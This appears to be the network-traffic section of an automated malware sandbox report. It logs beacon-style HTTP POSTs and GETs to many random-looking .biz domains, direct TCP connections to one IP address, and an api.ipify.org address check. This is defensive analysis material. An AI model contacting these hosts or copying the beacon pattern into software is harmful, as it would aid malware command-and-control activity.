Source: global traffic	HTTP traffic detected: GET /yq?usid=25&utid=8703410378 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /tlrsmavbccvnwuep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: GET /tlrsmavbccvnwuep?usid=25&utid=8703410598 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /asieco HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /jddjajyoe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /iphyiya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /ardo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /nnwqsplqbcbox HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /yqmsdjuyey HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /yqpffwpvinojygwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /ses HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /qnyqrcsymndllasg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /bc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /li HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /ev HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /vtneffnnlgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /xvgc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /tbbwyfgx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /pfrsud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /lkvkqbtwklkptpvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /dlpuagspsbxejxau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /eqmwmfvyliwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /oaickrbplfmnmgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /uamucyonicsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /ramdicwprogd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /edhrpwf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /nmcegkesku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /wi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /dwgeydrcwvx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /oyfrpxy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /ow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /vimpkpmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /pffrbkpnttaxats HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /bc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /kkffexjgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /afgoll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /uuetgwffqxlqakrc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /bbjmfesvmurxh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /earflafsrpsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /elhpchftdggocnkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /jxdmjixnumatu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /nuxquhjmvum HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /wkcytogysijgwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /byngwhigllxva HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /vl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770

Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qbfrwab?usid=25&utid=8703404410 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /f?usid=25&utid=8703404831 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /yq?usid=25&utid=8703410378 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: GET /tlrsmavbccvnwuep?usid=25&utid=8703410598 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
